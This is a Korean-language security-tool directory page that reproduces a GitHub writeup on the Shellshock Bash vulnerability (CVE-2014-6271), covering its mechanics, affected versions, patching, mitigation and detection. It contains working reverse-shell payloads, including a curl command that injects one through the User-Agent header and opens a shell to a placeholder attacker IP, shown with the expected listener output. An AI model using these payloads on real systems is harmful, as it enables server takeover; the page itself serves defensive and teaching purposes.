Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2014-6271 — CVE-2014-6271 | Kitploit
도구/GitHubGitHub/0xblackash/cve-2014-6271
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlPapers & ResearchLearning & Education
GitHub0xblackash/cve-2014-6271

CVE-2014-6271

CVE-2014-6271

저장소 보기
5개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2014-6271 — “Shellshock”

shellshock

25년간 묵혀온 제로데이 원격 코드 실행 — 환경 변수를 통한 GNU Bash 취약점

심각도 CVSS 영향받는 버전 패치됨


📖 개요

CVE-2014-6271, 일명 Shellshock (또는 Bashdoor)는 GNU Bash 셸의 치명적인 원격 코드 실행(RCE) 취약점입니다.
공격자는 특수하게 조작된 환경 변수(HTTP 헤더, DHCP, SSH 등을 통해)를 전송하여 원격 셸 접근을 얻을 수 있으며, 대개 인증이나 사용자 상호작용 없이도 가능합니다.


🧠 취약점 요약

항목값
CVE IDCVE-2014-6271
심각도🔴 치명적
CVSS10.0 (최대)
공격 벡터원격 (HTTP, DHCP, SSH 등)
인증 필요 여부❌ 없음 (다수 벡터에서)
사용자 상호작용❌ 없음 (CGI/DHCP 사례)
영향전체 서버 장악

⚙️ 기술 분석

📨 1단계 — 악성 환경 변수

공격자가 특수하게 조작된 변수(예: User-Agent 헤더)를 주입합니다:

root@kitploit:~
() { :; }; /bin/bash -i >& /dev/tcp/공격자-ip/4444 0>&1

🧩 2단계 — Bash 함수 구문 분석 결함

Bash는 페이로드를 함수 정의 + 후속 명령어로 잘못 처리합니다. 변수가 불러와질 때 (); 뒤의 코드가 즉시 실행됩니다.

💣 3단계 — 원격 실행

명령어는 웹 서버/프로세스의 권한(종종 root 또는 www-data)으로 실행됩니다.

결과:

root@kitploit:~
# 원격 셸 접근 성공
whoami
www-data

✅ 작업이 성공하면, 정확히 이 단계별로 보게 될 내용입니다:

shellshock

1. 터미널에서 (PoC 실행 직후)

root@kitploit:~
✅ 취약함! (Shellshock RCE 트리거)
vulnerable
test

리버스 셸이 즉시 연결되는 것도 확인할 수 있습니다.

2. 탐지 명령어 실행 시

root@kitploit:~
env x='() { :;}; echo vulnerable' bash -c "echo test"

즉시 반환됩니다:

root@kitploit:~
vulnerable
test

(이는 Bash가 주입된 명령어를 실행했음을 확인합니다.)

3. 성공의 진정한 증거 — 브라우저 또는 curl에서 (완전한 RCE를 얻었음을 알게 되는 순간)

취약한 Apache CGI 스크립트에 대해 이 curl을 실행하세요:

root@kitploit:~
curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" http://취약한-서버/cgi-bin/test.sh

netcat 리스너에서 이 정확한 출력을 보게 됩니다:

root@kitploit:~
bash: no job control in this shell
www-data@server:/var/www$ whoami
www-data
www-data@server:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@server:/var/www$ ls -la
total 12
drwxr-xr-x 2 www-data www-data 4096 Sep 24 14:00 .
...

이 출력이 직접 리버스 셸에 나타납니다. 오류 없음, 404 없음.
이는 서버에서 완전한 원격 코드 실행이 가능하다는 뜻입니다 — 환경 변수 주입이 완벽하게 작동했습니다.


🎯 왜 위험한가

  • ⚡ 25년 제로데이 (1989년부터 존재)
  • 🌐 매우 넓은 공격 표면 (CGI, DHCP, SSH, OpenVPN, CUPS…)
  • 🔓 대부분의 일반적인 벡터에서 인증 불필요
  • 🧨 완전한 RCE 능력
  • 📂 데이터 유출 및 랜섬웨어 진입 가능
  • 🔁 대규모 네트워크에서 웜 가능

📦 영향을 받는 버전

모든 GNU Bash 버전:

root@kitploit:~
1.14부터 4.3까지 (패치 레벨 30 이전)

(리눅스, macOS, BSD, 임베디드 장치 포함)


✅ 패치된 버전

즉시 업그레이드하세요:

root@kitploit:~
Bash 4.3 패치 레벨 30 이상 (4.4+ 권장)

🛡️ 완화 조치

1️⃣ 즉시 조치

  • 모든 시스템에서 Bash 업데이트:
    root@kitploit:~
    # Ubuntu/Debian
    apt update && apt install --only-upgrade bash
    
    # Red Hat/CentOS
    yum update bash
    

2️⃣ 웹 서버 강화

  • 가능하면 CGI/mod_cgi 비활성화
  • () { 차단을 위한 mod_security 규칙 사용
  • 환경 변수 전달 제한

3️⃣ 로그 모니터링

다음 항목 확인:

  • () {를 포함한 의심스러운 User-Agent / Referer
  • 예상치 못한 리버스 셸 또는 아웃바운드 연결
  • 웹 서비스에서 Bash 하위 프로세스 실행

🔍 탐지 팁

침해 지표는 다음과 같습니다:

  • () { :;};를 포함한 로그
  • 웹 서버 사용자가 만든 예상치 못한 파일
  • 높은 포트에서의 아웃바운드 연결
  • 웹 서버가 /bin/bash -i를 실행

🧪 개념 증명 (개념적)

root@kitploit:~
악의적인 헤더/DHCP/SSH → Bash 환경 변수 임포트
        ↓
함수 정의 + 후속 명령어 실행
        ↓
임의 명령어 / 리버스 셸

📌 관련 취약점

이 문제는 여러 후속 CVE(불완전한 수정)로 이어졌습니다:

  • CVE-2014-7169 (AfterShock)
  • CVE-2014-6277 / CVE-2014-6278
  • CVE-2014-7186 / CVE-2014-7187

📊 영향 평가

위험 영역영향
기밀성🔴 높음
무결성🔴 높음
가용성🔴 높음

🧩 교훈

  • 환경 변수를 절대 신뢰하지 마라
  • 셸의 함수 구문 분석은 매우 엄격해야 한다
  • 핵심 시스템 구성 요소의 오래된 버그는 치명적이다
  • 패치만으로는 부족하다 — 공격 표면을 강화하라

📚 참고 자료

  • NVD – CVE-2014-6271
  • Wikipedia – Shellshock
  • Red Hat Security Blog
  • Qualys Technical Analysis
  • CISA Alert TA14-268A

🚨 최종 권고

2026년에 리눅스/macOS/BSD 서버를 운영한다면: 🔥 Bash를 즉시 패치하세요 (에어갭 시스템에서도). 💡 인터넷에 노출된 패치되지 않은 Bash를 실행 중이라면 침해를 가정하세요. 🛡 전체 로그 검토 및 무결성 점검을 수행하세요.

도구 다운로드